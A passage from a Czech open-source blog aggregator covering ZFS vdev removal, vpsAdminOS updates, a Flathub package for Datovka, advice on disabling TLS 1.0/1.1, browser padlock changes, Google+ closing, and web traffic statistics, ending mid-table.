Planeta.OpenAlt.org

Odstranění vdev z ZFS poolu

ZFS letos dostalo od Oracle milý dárek. Po dlouhé době je konečně možné odstranit VDEV ze zpoolu a opravit tak například chybu administrátora, kdy místo přidání disku do existujícího vdevu jej přidal rovnou do zpoolu jako další vdev.

Ovšem neradujme se předčasně. Ano, ZFS od letošního roku (Solaris 11.4 beta, nebo FreeBSD 11.2) umožní odstranit celý VDEV, ovšem tato funkce není určená k běžnému přestavování zpoolu, spíše jen jako záchrana po překlepu administrátora.

ZFS při odstranění vdevu totiž jen vytvoří „virtuální“ vdev (který je navíc schovaný před zrakem administrátora a není vidět ve výpisech standardních nástrojů), který rozprostře na zbývající zařízení.

An virtual (pseudo device) is created to move the data off the (removed) pool devices so the pool must have enough space to absorb the creation of the pseudo device.

Což, vzhledem k tomu, že ZFS pracuje se všemi vdevy stylem RAID-0 (přidání vdevu do zpoolu nejen zvětší dostupný prostor, ale také významně zrychlí celý pool), může vést k výkonnostním problémům.

Which should be used as an exception rather than the rule for pool configuration on production systems.

Dalším bodem, na který je potřeba si dát pozor je nemožnost odstranit vdev z poolu, ze kterého se bootuje. GRUB tuto možnost zatím nepodporuje.

Odstranění se provádí příkazem zpool remove tank-name vdev-name, tedy například:

zpool remove tank mirror-0

Průběh odstraňování můžeme sledovat (ostatně jako průběh všech zpool operací) na výpisu:

zpool status 1

Kde parametr 1 znamená, že se bude výpis automaticky obnovovat každou 1s.

vpsAdminOS: změny v síťování, ISO ke stažení, zálohování a cgroupy

říjen
23
vpsFree.cz

Podařilo se nám najít jiný, jednodušší způsob routování IP adres do VPS bez spojovacích sítí.

Ve VPS na stagingu tak už nejsou žádné spojovací adresy, jen adresy veřejné. Jak síťování VPS aktuálně funguje je popsáno v dokumentaci.

U VPS na stagingu vpsAdmin rozlišuje adresy sítí (ty jsou do VPS naroutované) a koncové adresy co jsou přiřazeny na rozhraní. Správa IP adres je tak ve webovém rozhraní rozdělena na dva formuláře. Je to zatím jen takový základ na kterém budeme později stavět.

Díky zrušení spojovacích adres funguje maškaráda v iptables a s tím i výchozí síť v dockeru, která maškarádu využívá. Není potřeba si vytvářet vlastní síť. Teď už instalace dockeru neobsahuje žádné kroky navíc. Zbývá dořešit delegace ZFS datasetů do VPS, aby se v dockeru dal použít ZFS driver.

Pokud jste chtěli vpsAdminOS vyzkoušet, ale nechtělo se vám instalovat Nix a zjišťovat jak se to sestavuje, sorki připravil ISO s vpsAdminOS, které si můžete stáhnout a rovnou nabootovat. Je to live systém a obsahuje i instalátor, pokud to chcete nainstalovat na disk nebo si vyzkoušet deklarativní konfiguraci s Nixem.

Od pátku jsou VPS na stagingu zálohované, abychom se nemuseli bát o data. Obnova VPS ze záloh funguje, ale na staging si je zatím nepřipojíte. Na produkční VPS ty zálohy připojit půjdou. Nemáme ještě dořešené NFS, přijde to pak spolu s NASem.

Koncem srpna jsme narazili na nečekané omezení: věděli jste, že maximální počet memory cgroup je 65536? Několika členům už se podařilo je vyčerpat, takže jsme řešili jak ten limit navýšit. snajpa napsal patch do kernelu, který navyšuje maximální počet memory cgroup na 2147483648, nicméně zatím s tím nefunguje swap. Nám to nevadí, protože swap nepoužíváme.

Dále bylo potřeba omezit počet cgroup, které mohou vytvořit jednotlivé VPS, aby nikdo nemohl vyčerpat všechny a omezit tak ostatní. K tomuto účelu snajpa vytvořil cglimit cgroup controller. Můžete jej vidět i a používat i ve VPS. Přes cglimit.all.max se nastavuje limit na počet všech cgroup a přes cglimit.memory.max jen memory cgroupy.

Za pomoc s testováním děkujeme (nicky na IRC): ppar, somm, domogled, pdostal, etnyx a všem dalším co píší na podporu. Pokud narazíte na nějakou chybu, dejte nám o tom prosím vědět, rádi to opravíme.

Stanovisko SPIR k návrhu směrnice Rady o společném systému daně z digitálních služeb jako daně z příjmu z poskytování určitých digitálních služeb online

Stanovisko SPIR k návrhu směrnice Rady o společném systému daně z digitálních služeb jako daně z příjmu z poskytování určitých digitálních služeb online tereza.tumova@… Po, 10/22/2018 - 13:09

Stanovisko SPIR k návrhu směrnice Rady o společném systému daně z digitálních služeb jako daně z příjmu z poskytování určitých digitálních služeb online naleznete pod článkem.

Datovka na Flathubu

Jak už jsem tady psal, před časem jsem přešel na Silverblue, kde zkouším myšlenku neměnného systému, takže všechny desktopové aplikace provozuji ve Flatpaku. Z aplikací, které používám, mi na Flathubu chyběl Evolution a Datovka. Evolution jsem tam dostal asi před měsícem Datovku nyní.

Základ manifestu pro flatpak Datovky jsem napsal na LinuxDays během našeho workshopu na vytváření flatpaků. Má relativně málo závislostí. Kromě samotné Datovky musím sestavovat jen libxml2 a libisds. O zbytek (OpenSSL, Qt a jeho moduly) se postará KDE runtime.

Poprvé jsem taky vyzkoušel napsat manifest v YAMLu místo v JSONu. Píše se to jednodušeji, přijde mi to přehlednější. Jen tedy debuggování chyb v syntaxi je oproti JSONu opravdu opruz. Zatímco u JSONu mi Flatpak vrátí přesný řádek a znak chyby, u YAMLu jen neurčitá chybová hlášení a některé chyby v syntaxi přešel úplně. Takže z mé zkušenosti je YAML pro psaní manifestů dobrý do té doby, než v něm musíte hledat nějaké chyby 🙂

Napsat manifest, aby se aplikace sestavila a spustila, byla otázka asi půl hodiny. Ta skutečná zábava přichází v momentě, kdy chcete, aby aplikace ve Flatpaku běžela dobře, aby vše fungovalo, aby neměla otevřený přístup do hosta.

Prvním problémem bylo, že Datovka nebyla schopná ukládat nastavení a přihlašovací údaje. Ukázalo se, že místo, aby nechala umístění složky pro nastavení na Qt, které by ji umístilo do standardní cesty a v případě Flatpaku do sandboxu, natvrdo se snažila jej ukládat do /home. To by fungovalo, kdybych dal Datovce přístup do domovského adresáře uživatele, ale tím bych výrazně narušil sandbox, což jsem nechtěl. Nakonec to vyřešil jednoduchý patch, díky kterému Datovka ukládá nastavení do standardní cesty.

Dalším problémem bylo, že pokud jsem chtěl otevřít nějakou přílohu přímo (např. PDF v Evince), Datovka se soubor snažila uložit do /tmp. Opět někam, kde nemá přístup. Šlo by to vyřešit poskytnutím přístupu do celého hosta, ale znamenalo by to ještě větší narušení sandboxu než v předchozím případě. V tomto případě stačilo vytvořit spouštěcí skript, který nastavoval proměnnou prostředí TMPDIR=$XDG_CACHE_HOME, aby se soubor uložil do sandboxu. A pak byl předaný (jen) aplikaci, kterou uživatel vybere pro otevření.

A to bylo víceméně vše. Kromě přístupu k dconfu na hostovi (kvůli načtení tématu, nastavení písma atd.) nemá Datovka na úrovni souborového systému přístup k datům uživatele. Pokud do ní chcete nějaký soubor načíst (ať už je to příloha nebo třeba certifikát pro přihlášení), použije přes Qt portál a dostane přístup jenom k souboru, který uživatel vybere.

Datovka je docela typickým příkladem aplikace pro Linux. Byla psaná s tím, že má neomezený přístup do hosta, takže v sandboxu automaticky všechno nefunguje. Cesta nejmenšího odporu je jí prostě přístup do hosta povolit, ale často stačí jen pár drobných úprav na straně aplikace a funguje i v sandboxu bez problémů.

Pokud používáte prostředí založené na GTK+ a doinstalujete si QGnomePlatform rozšíření KDE runtimu, které překládá změny v nastavení GTK+ do Qt, bude se vám Datovka do prostředí integrovat i vzhledově.

Datovka po přepnutí prostředí na tmavé téma.

Na Flathubu jsem musel projít standardním review, které je dost podobné tomu, kterým musíte projít, když chcete dostat balíček do distribuce. Např. Snap Store něco takového nedělá (sandboxované snapy jsou přijaté automaticky, nesandboxované projdou jenom rychlou bezpečnostní prohlídkou), což si myslím je škoda, protože se na to podívají odborníci, kterým prošly rukama už stovky manifestů, a zatím mi vždycky pomohli manifest výrazně vyladit (odstranit zbytečně bundlované závislosti, upravit tak, aby se to sestatovalo i na ostatních architekturách, odstranit práva, která aplikace nutně nepotřebuje atd.).

Na Flathubu je taky preferované, aby se o flatpaky starali přímo upstreamoví vývojáři, takže jsem je přes jeden svůj kontakt v CZ.NICu oslovil, jestli by Datovku ve Flathubu nechtěli převzít. Zájem nebyl. Navíc mě požádali, abych do popisu přidal, že flatpak není spravovaný jimi. S tím nemám problém. Myslím si, že když se o flatpak stará někdo jiný než upstreamový vývojář, mělo by to být uživateli deklarované.

CZ.NIC dělá v OBS oficiální balíčky pro 3 distribuce (Fedora, Debian, Ubuntu) a testují to ještě na Linux Mintu a Gentoo. Flatpak samozřejmě pokrývá výrazně víc a také na rozdíl od balíčků CZ.NICu podporuje taky architekturu ARM, proto si myslím, že má smysl ho pro Datovku udržovat. Datovka už neprochází nějakým překotným vývojem a Flatpak poskytuje na všech distribucích stejné prostředí, stačí tedy testovat jenom jednou, takže si nemyslím, že údržba flatpaku Datovky bude náročná, a není to nic, o co bych se nemohl starat sám.

Zkusím ještě, jestli upstream nebude mít zájem o patche, které jsme udělali, aby Datovka ve Flatpaku dobře běžela. Myslím, že mají smysl obecně. Navíc bych jim chtěl navrhnout, aby přešli u ID aplikace na schéma reverse-DNS, v tomto případě org.cznic.Datovka, které jsem musel použít, protože Flatpakem je vyžadováno, ale hodí se obecně pro unikátní identifikaci aplikace třeba pro uživatelská hodnocení napříč distribucemi.

Závěrem bych chtěl poděkovat Honzovi Grulichovi, který mi hodně pomohl hlavně s věcmi kolem Qt.

A ještě tedy profil Datovky na Flathubu 😉

Co je pracovní náplň programátora

říjen
18
Josef Jebavý
Někteří lidé si říkají, že programátor jen sedí u počítače. Takový názor však plyne z neznalosti a z těžké ocenitelnosti práce programátora. Stejně tak by se dalo říci, že řidič sedí jen za volantem nebo učitel si chodí hrát s dětmi. Náplní řidiče však je bedlivě sledovat provoz a naplní učitele je pracovat s dětmi a pomáhat jim růst.

Vypněte TLS 1.0 a 1.1 už dnes

říjen
16
Michal Spacek

Protokol TLS (Transport Layer Security) je základem HTTPS a jeho první verze vyšla v roce 1999. Byl to nástupce protokolu SSL 3.0 z roku 1996, ten už prohlížeče nepodporují tři roky a váš server by taky dávno neměl. Platební brány a weby pracující s platebními kartami nesmí TLS 1.0 používat od letošního léta.

Zahoďte TLS 1.0 a 1.1

Verze TLS 1.1 vyšla o pár let později, v roce 2006, ale podobně jako TLS 1.0 používá překonané algoritmy MD5 a SHA-1. TLS verze 1.0 ani 1.1 prohlížeče běžně už nepoužívají:

  • Google tvrdí, že s těmito protokoly je v Chrome uskutečněno jen 0,5 % HTTPS spojení
  • V Edge je to prý 0,72 %
  • V Safari údajně 0,36 %
  • Firefox uskuteční 1,11 % všech HTTPS spojení pomocí TLS 1.0 a 0,09 % pomocí TLS 1.1

Pokud server tyto protokoly stále podporuje, tak hrozí, že útočník donutí prohlížeč použít je namísto bezpečného TLS 1.2 nebo TLS 1.3. Bylo by tedy vhodné je na serveru zakázat, ale předtím je dobré si zjistit, jaké prohlížeče tyto protokoly vyžadují. Už jich moc není, v seznamu nenajdete ani jeden moderní browser.

Handshake simulation

Prohlížeče, které se po vypnutí TLS 1.0 a 1.1 na váš server nepřipojí, můžete zjistit třeba otestováním vlastního webu pomocí nástroje SSL Labs Server Test. Do políčka Hostname zadejte vaší doménu, stiskněte Submit a chvíli počkejte na dokončení testu.

Známka A+ v SSL Labs Server Testu

Můj web dostal v hodnocení známku A+, nejlepší možnou, jak překvapivé

Test vyzkouší nastavení HTTPS na vašem webu, ten by měl ideálně získat známku A nebo A+, kterou ale aktuálně dostanete i když máte staré TLS povolené. Na hodnocení má vliv několik nastavení, které jsem se pokusil krátce vysvětlit ve své přednášce o SSL Labs. Ale tenhle článek není o známkách, níže se budu věnovat převážně jen protokolům TLS.

Ve výsledcích pod informacemi o certifikátech začíná sekce Configuration. V ní uvidíte, které protokoly server podporuje a v části Handshake Simulation jsou uvedeny testované prohlížeče, protokoly a šifry, které ke spojení používají.

Handshake Simulation ve výsledcích SSL Labs Server Testu

Část výsledků simulace prohlížečů pro náhodný web

„Handshake“ je počáteční část HTTPS spojení, během které se prohlížeč a server domluví na tom, jaké protokoly, šifry a šifrovací klíče budou používat. SSL Labs zkouší simulovat cca 50 různých prohlížečů a výsledky této domluvy pak zobrazí v přehledné tabulce.

Řádek po řádku

Pojďme si rozebrat třeba hned ten první řádek, do detailů kryptografie ale zacházet nebudeme, nebojte:

Android 2.3.7 No SNI² RSA 2048 (SHA1) TLS 1.0 TLS_RSA_WITH_AES_128_CBC_SHA No FS
Android 2.3.7
Simulovaný prohlížeč (obecně HTTPS klient) a verze
No SNI2
Poznámka, která v tomto případě říká, že Android 2.3.7 nepodporuje SNI (Server Name Indication), což je technologie dovolující na jedné IP adrese provozovat více webů na HTTPS, každý s vlastním certifikátem (ta „2“ v „SNI2“ je jen odkaz na poznámku pod čarou) – ve finále to znamená, že pokud chcete podporovat i takto staré Androidy, tak pro váš web musíte mít vyhrazenou IP adresu
RSA 2048 (SHA1)
RSA znamená spoustu věcí, v tomto případě ale označuje typ certifikátu a soukromého klíče, 2048 pak velikost toho klíče a SHA1 algoritmus použitý pro podpis certifikátu, který by se již běžně používat neměl
TLS 1.0
Použitý šifrovací protokol ve verzi, které se zrovna náhodou chceme zbavit
TLS_RSA_WITH_AES_128_CBC_SHA
Použitá šifra, přesněji „cipher suite“, která určuje, jak proběhne výměna klíčů a jaký šifrovací algoritmus se použije
No FS
„FS“ znamená Forward Secrecy a test nám zde naznačuje, že „cipher suite“ se tímto označením nemůže pyšnit a že pokud by mizera získal soukromý klíč ze serveru, tak by mohl rozšifrovat již proběhlou zaznamenanou komunikaci i tu, která teprve proběhne

A teď ten poslední řádek z předchozího obrázku:

Android 7.0 EC 256 (SHA256) TLS 1.2 > h2 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 ECDH x25519 FS
Android 7.0
O dost novější verze, že
EC 256 (SHA256)
Byl použit certifikát i soukromý klíč využívající Elliptic-curve cryptography, EC klíče i certifikáty jsou o dost menší (klíč má „jen“ 256 bitů) a zpracovávají se rychleji, podpora je také výborná (já na svém webu používám už jenom EC certifikáty); SHA256 je pak označení pro podpisový algoritmus z rodiny hashovacích funkcí SHA-2, která by se pro certifikáty měla používat
TLS 1.2 > h2
Spojení proběhlo pomocí TLS 1.2, „> h2“ naznačuje, že bylo využito protokolu HTTP/2
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
Použitá šifra, resp. „cipher suite“
ECDH x25519
Upřesnění výměny klíčů v dané „cipher suite“, který proběhla pomocí algoritmu Elliptic-curve Diffie–Hellman s eliptickou křivkou označovanou jako X25519
FS
„Cipher suite“ podporuje Forward Secrecy, takže mizera, který se dostane k soukromému klíči ze serveru nedokáže minulou ani budoucí komunikace dešifrovat

Pohledem na všechny řádky zjistíte, který prohlížeč by použil TLS 1.0 nebo 1.1. Pokud takové prohlížeče již nechcete nebo nemusíte podporovat, tak tyto zastaralé protokoly v konfiguraci vašeho serveru vypněte. Nedávno to udělal např. i Slevomat, viz výsledky testu. A když to mohl vypnout Slevomat, tedy komerční web pro velmi širokou veřejnost, tak vy můžete nejspíš také. Správce serveru by to měl zvládnout, v Apache k tomu slouží direktiva SSLProtocol, v nginx ssl_protocols.

Nepodporované prohlížeče

Na konci sekce Handshake Simulation najdete pod hlavičkou Not simulated clients (Protocol mismatch) prohlížeče, které se v defaultním nastavení chtěly připojit již nepodporovaným protokolem. Pro můj web ta podstatná část vypadá takto, přičemž na obrázku chybí ještě stará Java, knihovna OpenSSL z dob, kdy se po Zemi ještě proháněli dinosauři a Safari verze 5 a 6 na OS X:

Not simulated clients (Protocol mismatch)

Na můj web se nepřipojí ani Chrome 49 na Windows XP, protože ten by potřeboval RSA certifikát, který jsem přestal používat. Pokud browser zvládne TLS 1.2, tak zvládne i EC certifikát, s touhle jedinou výjimkou, takže je můžete v klidu používat. Pokud byste stále potřebovali podporovat i Chrome na Windows XP, tak můžete použít oba typy certifikátů zároveň, pokud to váš server umí a Apache i nginx to umí.

Vypněte nepoužívané věci

Když už budete v tom vypínání starých TLS, tak stejně můžete postupovat u „cipher suites“. SSL Labs Server Test některé „cipher suites“ označí jako slabé („weak“), některé dokonce jako „insecure“, ale pokud je žádný vámi podporovaný prohlížeč nepoužívá, tak je z konfigurace serveru můžete také odstranit. Můj server nabízí jen 5 „cipher suites“, konfiguraci jsem převzal z generátoru od Mozilly, přičemž jsem použil profil „Modern“.

Pokud se o HTTPS zajímáte ještě víc, tak vás rád přivítám na dalším termínu mého školení HTTPS (13. prosince 2018 Praha).

Máme nové servery, jsou plně záplatované proti známým chybám CPU

říjen
15
vpsFree.cz

Máme nainstalované nové servery, mají komplet záplatování proti všem známým chybám CPU.

Pokud na naší infrastruktuře provozujete citlivé věci, pište na podporu, přesuneme vám je na nové servery. Přednost dostanou ti, co mají na disku zabráno pár desítek GB. Pokud jste měli v poslední době problém s výkonem I/O, pište taky.

Nové servery mají zatím jenom tři 2TB SSD v raidz, bude se přidávat dál po třech SSD (cca 60-70 tisíc korun najednou, proto takhle).

Jsou to bazarové Intely, 2× E5-2680 v4 @ 2.40GHz (28 cores, vypnuté HT) + 512 GB RAM, Dell R730xd, jeden vyšel cca na 300 tisíc korun (SAS3, 2x10GE, iDRAC enterprise and what not). Ve vpsAdminu jsou označené jako node17.prg, node18.prg a node4.brq.

Mnoho obrázků nových serverů najdete v naší fotogalerii.

Mám z nich docela radost, sviští pěkně.

Ale abych pravdu řekl, úplně nejvíc se těším na to, až se AMD vytáhne s trochu aktualizovaným fabricem mezi těmi jejich čipy a DDR4 až zlevní… Zatím Intel pro naše použití vede výkonové i po nasazení všech záplat na bezpečnostní chyby v procesorech.

Prohlížeče postupně skrývají zámeček a je to dobře

říjen
14
Michal Spacek

Používáte webový prohlížeč Google Chrome? A už máte jeho novou verzi? Nejspíš ano, vyšla začátkem září, má číslo 69 a na první pohled ji poznáte: má kulaté rohy. Nejvíc je to vidět v tom místě, kde se zobrazuje adresa stránek, v adresním řádku. Chrome ho nazývá omnibox – protože už v něm nejde jen o adresu, zadáváte do něj také vyhledávací dotazy, z nichž některé umí rovnou i zodpovědět (zkuste: počasí, usd, kdo je prezident). Funguje také jako jednoduchá kalkulačka.

Zelená je tak akorát tráva

V levé části omniboxu je na některých stránkách zámeček. Najdete ho na Facebooku, Googlu, ve vašem bankovnictví, ale také na všech mých webech. Možná si vzpomenete, že vás na zámeček někdo kdysi upozornil, ale že zmiňovali zelený zámeček a že prý tak poznáte bezpečnou stránku.

Omnibox v Chrome 68

Omnibox v Chrome 68

Omnibox v Chrome 69

Omnibox v Chrome 69

Nepoznáte, ale k tomu se ještě dostaneme. Zpátky k barvám. Ten zámeček byl opravdu zelený, vedle něj byl nápis „Secure“ („Zabezpečeno“), to až v nové verzi Chrome zešednul. Jestli jste si zámečku doteď nevšimli a veškeré rady tak úspěšně ignorovali, tak si z toho vůbec nic nedělejte. Google, výrobce Chrome, se totiž ten zámeček postupně snaží udělat neviditelným. V některých dalších verzích prohlížeče zmizí úplně, bez náhrady. Zatím není známo kdy, ale mohlo by to být už příští rok. Ostatní prohlížeče budou Chrome pravděpodobně následovat. Co ten zámeček vlastně znamená a proč postupně mizí a proč je to dobře?

Odposlechy na náměstí

Internet byl v dřívějších dobách takové náměstí. Lidé seděli na lavičkách, povídali si a kdokoliv šel kolem, tak jejich hovor mohl zaslechnout. Když jste chtěli zmrzlinu, tak jste svému „poskytovateli zmrzliny“ dali svou platební kartu a požádali ho, aby vám dva kopečky přinesl. On zmrzku někde sehnal, zaplatil vaší kartou a zároveň si z ní údaje opsal, aby si mohl příště zmrzku kupovat sám a za vaše.

Já vím, přirovnání ze skutečného světa na ten internetový moc nepasují, ale zkuste si to alespoň trochu představit. Váš poskytovatel Wi-Fi nebo připojení k Internetu mohl vidět co si čtete, co komu posíláte, vaše hesla apod. Vše mohl také měnit. Takže když vám hodný Míša poslal jeho číslo účtu, abyste mu zaplatili ten dluh ze sobotní noci, tak ho „někdo“ po cestě mohl změnit a vám přišlo číslo účtu někoho jiného. Ten „někdo“ k tomu mohl přibalit reklamu na nějaký produkt, odkaz na stránku, která mu vydělá nějaké drobné, nebo taky třeba odkaz na stažení zákeřného viru. Vy jste ale neměli šanci poznat, že to poslal někdo jiný a ne Míša. Když se nad tím zamyslíte, tak to vypadá spíš víc jako džungle, než jako náměstí.

Podobné ikony zámečku a nákupní tašky na www.apple.com

Ikona zámečku vypadá skoro jako nákupní taška, kdo se v tom má vyznat

Ten zámeček znamená, že vaše informace a data tou džunglí cestují chráněná. Chrání je matematika v podobě šifrování. Technicky se tomu šifrování přenášených stránek říká HTTPS, kde to S znamená Secure. Pro lepší zapamatování můžete použít i alternativní význam: How To Transfer Private ShitStuff.

Úplně vás slyším, jak se chcete zeptat a odpověď je ne, zámeček nezaručí, že stránka, u které se zobrazuje, nezneužije vaše platební údaje, neprodá vaše hesla nebo že vám dodá zboží včas a že můžete věřit všemu, co se na té stránce píše. Zámeček se tak klidně může objevit u stránek s hloupostmi typu „země je placatá“ a znamená jediné: opravdu to na té stránce píší a nepřidal to tam nikdo během toho, co stránka tou internetovou džunglí cestuje k vám.

Zámečku jsme postupně začali přisuzovat skoro magické vlastnosti: třeba to, že stránka se zámečkem je prý důvěryhodná. Není, mizerové ten zámeček mohou dát o pár centimetrů jinam jako obrázek nebo si ho zkrátka taky pořídí. Tzv. HTTPS certifikát, díky kterému prohlížeč ten zámeček zobrazí, dá se sehnat zdarma.

Šifrování všude

Vysvětlit co ten zámeček znamená se nedá jedním nápisem „Secure“ nebo „Zabezpečeno“. Možná by tedy bylo vhodnější, kdyby takový nápis i zámeček zmizel úplně a prohlížeč místo toho upozorňoval spíš na ty špatné věci. Šifrování by mělo chránit veškeré stránky na webu a měli bychom to brát jako samozřejmost.

HTTP stránky finální stav: ⚠ Not secure | example.com

Ve finále budou všechny stránky na nešifrovaném HTTP označené červeným ⚠ Not secure (zdroj)

Prohlížeč by měl spíš označovat stránky, které šifrování nepoužívají. A to už také dělá. Stránky bez ochrany HTTPS jsou označené jako „Not secure“, „Nezabezpečeno“. Zatím to není moc výrazné, ale jednou, snad již brzy, to bude napsané červeně s vykřičníkem. Když takovou stránku s nápisem Nezabezpečeno uvidíte, tak buďte na pozoru. Nezadávejte do ní číslo platební karty, nepřihlašujte se, nic z ní nestahujte a počítejte s tím, že to co čtete, mohl na stránku přidat nějaký poskytovatel banánů v džungli.

Je také možné, že správce vašich oblíbených stránek zaspal a šifrování prostě jen nezapnul. V tom případě je to jednoduché: napište mu, ať to udělá. Pomůžete tak Internet udělat bezpečnějším místem na zemi.

Long live the EMAIL!

říjen
11
Vlastimil Ott
Jsem přihlášený v klientské aplikaci pojišťovny, čemuž předcházelo generování kódů a potvrzování přes esemesky. Nemůžu najít, jak se ukončuje smlouva (tuším záměr). Vyplňuji formulář s dotazem, odesílám. Vzápětí mi dorazí e-mail s textem dotazu a VŠEMI ÚDAJI VČETNĚ mého telefonní čísla, čísla smlouvy, typu pojištění, části adresy a mého data narození. Odesílá se na obecnou ...

Přečíst celý článek > Long live the EMAIL!

Sbohem Google+, vítej Mastodone

Před pár dny Google oznámil, co už bylo nějakou dobu jasné: Google+ končí. Znamená to konec sociální sítě, která byla velmi populární v open-source a linuxové komunitě, kam dál?

Když v roce 2011 Google oznámil „zabijáka Facebooku“ Google+, velké množství lidí kolem mě to vzalo s nadšením. Facebook začínal být nepopulární. Byli tam všichni, obsah se posunul od smysluplných příspěvků k fotkám koček a jídla, rozhraní nebylo dvakrát povedené.

Google+ vedle toho působil svěže – jednoduchý, přehledný design, systém kruhů, který mi vždycky přišel logičtější než „přátelé a spol.“ na Facebooku. I tak ale bylo překvapující, kolik open-source nadšenců si Google+ oblíbilo vzhledem k tomu, že byla provozovaná Googlem, který už tenkrát neměl nejlepší pověst, co se týče soukromí, a byla to zcela uzavřená platforma.

Krátkou dobu někteří (a přiznám se, že jsem k nim chvíli taky patřil) žili sen, že by Google+ mohlo vytlačit Facebook. To se záhy ukázalo jako naivní představa, mainstreamového uživatele to nikdy nezasáhlo. Vytvořila se tam ale silná komunita technicky zdatných uživatelů a dlouho to pro mě byl jeden z hlavních zdrojů zpráv ze světa Linuxu. Pár měsíců po startu jsem si i tady pochvaloval, že máme větší aktivitu na našich účtech na Google+ než na Twitteru nebo Facebooku.

Časem ale Google zjistil, že z toho „zabiják Facebooku“ nebude, a pomalu Google+ omezoval z plnohodnotné sociální sítě na platformu pro diskusi v komunitách. To ale odliv uživatelů spíš urychlilo. Postupně aktivita upadala i mezi lidmi v linuxové komunitě a i já tam už několik let pravidelně nic nepsal a postupně tam přestal i chodit. Já i většina lidí kolem mě se přesunula na Twitter. Přesto se tam pořád nacházela malá skupina zajímavých přispěvatelů, kteří zarputile zveřejňovali příspěvky tam a kvůli kterým mělo smysl Google+ občas otevřít.

Za oznámení, že Google+ za 10 měsíců definitivně končí, jsem nakonec rád, protože to byl jasný signál i pro ty poslední zarputilé přispěvatele, že tady už to opravdu nemá budoucnost. Taky je to pro mě důvod ukončit správu účtů pro Red Hat a Fedora CZ, kterou jsem na Google+ dělal už jenom ze setrvačnosti.

Na Google+ mi asi nejvíc bude chybět uživatelské rozhraní a jeho odezva. S ním je i po těch letech nulových investic ze strany Googlu radost pracovat a to samé platí pro mobilní aplikaci. Jaký to rozdíl oproti Facebooku…

Kam dál? Před nedávnem jsem psal, že zkouším Mastodon. Až do tohoto týdne to byla síť, která nebyla úplně mrtvá jako Diaspora, ale také nehýřila nějakou velkou aktivitou. Oznámení o konci Google+ se nejvíc projevilo právě tam. Během jednoho dne jsem získal několik desítek nových sledujících, výrazně to tam ožilo. Naopak na Twitteru jsem nezaznamenal prakticky žádnou změnu. Může to být tím, že lidi z Google+ už tam účty měli, může to být tím, že jim prostě Twitter nevyhovuje.

Hodně z nich Google+ používalo jako takovou lehkou blogovací platformu. Omezení na 280 znaků pro něj prostě nefunguje. Mastodon má na běžných instancích omezení 500 znaků, ale pokud si rozjedete vlastní, můžete si nastavit (téměř) libovolný. Další věcí, kterou „uprchlíci“ z Google+ možná nechtějí opakovat, je být opět závislý na dobrovůli jedné firmy. Přejdou k Twitteru a za pár let se jim může stát to samé, co na Google+: služba skončí nebo třeba výrazně změní podmínky. V tomto je Mastodon prostě jiný. Pokud skončí nebo výrazně změní podmínky instance, na které jedu, můžu si vyexportovat všechna data a přenést si je jim. Změní se mi jenom adresa.

Uspět na poli sociálních sítí proti korporacím jako Facebook je velmi těžký úkol. Očividně i pro Google, natož pro komunitní projekt. Nemyslím si tedy, že se někdy Mastodon stane mainstreamem, ale to je OK, stačí mi, když tam budou lidi z mojí subkultury. Ostatně jako tenkrát na Google+.

Stanovisko SPIR a VNICTP k návrhu nařízení o bránění šíření teroristického obsahu online

Stanovisko SPIR a VNICTP k návrhu nařízení o bránění šíření teroristického obsahu online tereza.tumova@… Pá, 10/05/2018 - 11:25

SPIR a VNICTP souhlasí, že nezákonný obsah podporující terorismus nemá být na internetu šířen a má být odstraňován. Nástroje určené k dosažení tohoto cíle však musí být voleny citlivě s ohledem na závažné negativní dopady, které by mohly nevhodně volené nástroje mít pro svobodu projevu a podnikatelské prostředí v digitálním sektoru, zejména pak veškeré hostingové služby a také mediální domy, které umožňují nahrávání obsahu třetím stranám.

SPIR proto podporuje záměr navrhované úpravy, ale jednotlivá navrhovaná opatření je třeba upravit s ohledem na následující body, které jsou uvedeny ve stanovisku (ke stažení pod článkem).

Nové podzimní pořady přilákaly uživatele ke sledování online vysílání televizí a rádií

Nové podzimní pořady přilákaly uživatele ke sledování online vysílání televizí a rádií tereza.tumova@… St, 10/03/2018 - 10:15

S příchodem podzimu tradičně přichystaly televizní stanice nové zábavní formáty a atraktivní pořady, aby přilákaly diváky k obrazovkám po prázdninové sezóně.Nové pořady a informace o nich byly také dostupné online, což ovlivnilo nárůst návštěvnostikategorie TV, rádia. Vliv na zvýšení počtu návštěvníků  těchto webů mohl mít také rychlý a prudký příchod studeného podzimního počasí, kvůli kterému začali uživatelé trávit více času doma a během dlouhých večerů sledovat své oblíbené pořady na internetu.

Kategorie TV, rádia rostla rovnoměrně na všech měřených platformách a její nárůst se pohyboval v rozmezí 9 – 11 %. Nejvyšší absolutní nárůst počtu uživatelů byl zde zaznamenán u klasických počítačů (více než 341 tisíc RU), dále na mobilních telefonech (233 tisíc RU) a tabletech (více než 61 tisíc RU). 

Další kategorií, která ve srovnání s předchozím měsícem zaznamenala nárůst počtu návštěvníků, byly IT servery, mobilní a digitální technologie. Vliv na zvýšení návštěvnosti těchto webů mohl mít zájem uživatelů o informace, týkající se změn ve vysílání některých kanálů České televize, které měly proběhnout k 30. září. Největší nárůst byl u této kategorie zaznamenán na tabletech (16 %); na klasických počítačích přesáhl 5 % a na mobilních telefonech 2 %.

Po návratu z dovolených a s nadcházejícím podzimem se uživatelé začali více zajímat o své zdraví a vyhledávat rady týkající se například zdravotních potíží nebo fit životního stylu. Díky tomu se mírně zvýšila návštěvnost kategorie Zdraví a to především na tabletech (9 %) a klasických počítačích (více než 2 %).

Tab. 1. Výsledky měření návštěvnosti internetu na jednotlivých zařízeních –  srpen a září 2018.

 

Počítače

Srpen

 

Září

Absolutní 
změna

Relativní změna

Reální uživatelé (RU)

6 755 343

6 734 537

-20 806

-0,31%

Zhlédnuté stránky (PV)

13 457 996 070

12 998 711 292

-459 284 778

-3,41%

Reální uživatelé (RU) – PC doma

6 641 491

6 623 715

-17 776

-0,27%

Zhlédnuté stránky (PV) – PC doma

10 325 510 794

10 075 876 102

-249 634 692

-2,42%

Reální uživatelé (RU) – PC v práci

1 881 687

1 874 632

-7 055

-0,37%

Zhlédnuté stránky (PV) – PC v práci

3 132 485 276

2 922 835 190

-209 650 086

-6,69%

Mobilní telefony

Srpen

 

Září

Absolutní 
změna

Relativní změna

Reální uživatelé (RU)

4 001 227

4 021 953

20 726

0,52%

Zhlédnuté stránky (PV)

2 351 083 801

2 224 195 320

-126 888 481

-5,40%

Tablety

Srpen

 

Září

Absolutní 
změna

